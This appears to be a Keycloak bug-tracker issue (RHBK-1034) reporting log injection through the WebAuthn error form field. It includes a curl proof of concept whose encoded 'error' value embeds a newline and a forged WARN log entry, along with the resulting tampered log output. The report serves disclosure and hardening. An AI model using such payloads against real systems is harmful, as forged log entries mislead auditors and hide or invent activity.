Uploaded image for project: 'Red Hat build of Keycloak'
  1. Red Hat build of Keycloak
  2. RHBK-1034

[GHI#25078] Log Injection during WebAuthn authentication/registration

XMLWordPrintable

    • False
    • Hide

      None

      Show
      None
    • False

      Before reporting an issue

      [X] I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.

      Area

      authentication/webauthn

      Describe the bug

      Errors in browser client during setup/auth with "Security Key login" (WebAuthn) are written into the form, send to Keycloak and written to log without escaping. Any content could be send with this request and therefore allows log injection.

      Version

      22.0.5

      Expected behavior

      Message from user input are escaped to prevent (log) injection attacks.

      Actual behavior

      Request data is written to in log without escaping and allows log injection.

      How to Reproduce?

      • Start login with a user, who is required to setup a second auth factor
      • Configure "Security-Token"
      • Get form URL (<FORM_URL>) from page source code
      • Run command in terminal:

      ```shell
      curl '<FORM_URL>' \
      -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7' \
      -H 'Content-Type: application/x-www-form-urlencoded' \
      -H 'Cookie: AUTH_SESSION_ID=9249c14d-1baa-43ba-a110-bbcdff689e9e.19d58cc8a8cf-28439; AUTH_SESSION_ID_LEGACY=9249c14d-1baa-43ba-a110-bbcdff689e9e.19d58cc8a8cf-28439; KC_STATE_CHECKER=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI3NzQ1OTFkOC1hNGNlLTQ5MjUtODFlZS01NWQ5ZmM0YjhlZTgifQ.eyJta3kiOiJpbnZhbGlkQ29kZU1lc3NhZ2UiLCJtdHkiOiJFUlJPUiIsIm1wYXIiOltdLCJzdGF0Ijo0MDAsInN0MiI6ImY0NGE4NDU1LTU5MWYtNGNjYi1hZWZiLTIxYmQwMzE5OTRjYiJ9.AruNFsHMyHt1SF31TaRsN875qquIMSKhxp-dwfE4zts; KC_RESTART=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI3NzQ1OTFkOC1hNGNlLTQ5MjUtODFlZS01NWQ5ZmM0YjhlZTgifQ.eyJjaWQiOiJhY2NvdW50LWNvbnNvbGUiLCJwdHkiOiJvcGVuaWQtY29ubmVjdCIsInJ1cmkiOiJodHRwOi8vbG9jYWxob3N0OjgwODAvYXV0aC9yZWFsbXMvYzEtczEtaTEvYWNjb3VudC8jLyIsImFjdCI6IkFVVEhFTlRJQ0FURSIsIm5vdGVzIjp7InNjb3BlIjoib3BlbmlkIiwiaXNzIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL2F1dGgvcmVhbG1zL2MxLXMxLWkxIiwicmVzcG9uc2VfdHlwZSI6ImNvZGUiLCJjb2RlX2NoYWxsZW5nZV9tZXRob2QiOiJTMjU2IiwicmVkaXJlY3RfdXJpIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL2F1dGgvcmVhbG1zL2MxLXMxLWkxL2FjY291bnQvIy8iLCJzdGF0ZSI6IjNjNDUzMWJkLTYxNTMtNDRiYS05MDc1LWE1NzcyY2Y4MTA5ZSIsIm5vbmNlIjoiZjQ4MDUzNDktZDIxMi00Mzc3LThmODMtYTBjOGZjZDQxY2UzIiwiY29kZV9jaGFsbGVuZ2UiOiJOa1RxTHFWUl9jWjJFVEd1VGZxOHJTYVpHdzdCd1BXdUdSVFVHa29oSjlzIiwicmVzcG9uc2VfbW9kZSI6ImZyYWdtZW50In19.U2_FfhLkAzJILgHfVYVL1-4dE4B7oEULDtRTl5XpgBw; __snackbar=IjZmMjA3NGFiZTg4MDUxZGQi.3USigr8kqbvE758yaKF5QkElgCUgieTfik%2FewsWYuhw; __session=ImE4ZTFmZTRhMTUzZmNlZjIi.MsiBCXKE1XZZHwcBe2lbTQ2RwnoTNplIR5sByOMB97Q' \
      --data-raw 'clientDataJSON=&attestationObject=&publicKeyCredentialId=&authenticatorLabel=&transports=&error=invalid%5Fuser%5Fcredentials%2C%20credential%5Ftype%3Dwebauthn%2C%20auth%5Fmethod%3Dopenid%2Dconnect%2C%20web%5Fauthn%5Fregistration%5Ferror%5Fdetail%3D%27NotAllowedError%3A%20The%20operation%20either%20timed%20out%20or%20was%20not%20allowed%2E%20See%3A%20https%3A%2F%2Fwww%2Ew3%2Eorg%2FTR%2Fwebauthn%2D2%2F%23sctn%2Dprivacy%2Dconsiderations%2Dclient%2E%27%2C%20custom%5Frequired%5Faction%3Dwebauthn%2Dregister%2C%20response%5Ftype%3Dcode%2C%20web%5Fauthn%5Fregistration%5Ferror%3Dwebauthn%2Derror%2Dregister%2Dverification%2C%20redirect%5Furi%3Dhttp%3A%2F%2Flocalhost%3A8080%2Fauth%2Frealms%2Fc1%2Ds1%2Di1%2Faccount%2F%23%2F%2C%20remember%5Fme%3Dfalse%2C%20code%5Fid%3D9249c14d%2D1baa%2D43ba%2Da110%2Dbbcdff689e9e%2C%20response%5Fmode%3Dfragment%2C%20username%3Da%27%0A2023%2D11%2D03%2009%3A32%3A33%2C614%20WARN%20%20%5Borg%2Ekeycloak%2Eevents%5D%20%28executor%2Dthread%2D14%29%20type%3DCUSTOM%5FREQUIRED%5FACTION%5FERROR%2C%20realmId%3Dinst%2D001%2D001%2D001%2C%20clientId%3Daccount%2Dconsole%2C%20userId%3Dd5410969%2D4a04%2D4f35%2D87d3%2D76b9343119b2%2C%20ipAddress%3D172%2E18%2E0%2E1%2C%20error%3Dthe%20admin%20did%20something%20very%20evil%21%21%21%2C%20remember%5Fme%3Dfalse%2C%20code%5Fid%3D9249c14d%2D1baa%2D43ba%2Da110%2Dbbcdff689e9e%2C%20response%5Fmode%3Dfragment%2C%20username%3Dadmin'
      ```

      The decoded error part contains manipulated log entries:

      ```
      invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
      2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin
      ```

      • after sending that, the log contains the following entries:

      ```
      keycloak-base-keycloak-1 | 2023-11-03 10:14:01,861 WARN [org.keycloak.authentication.requiredactions.WebAuthnRegister] (executor-thread-52) WebAuthn API .create() response validation failure. invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
      keycloak-base-keycloak-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin
      keycloak-base-keycloak-1 | 2023-11-03 10:14:01,870 WARN [org.keycloak.events] (executor-thread-52) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
      keycloak-base-keycloak-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a
      ```

      This is only a poc, more sophisticated log manipulation is certainly possible.

      Anything else?

      This has been reported as a vulnerability, but was considered a security hardening issue.

            Unassigned Unassigned
            pvlha Pavel Vlha
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

              Created:
              Updated:
              Resolved: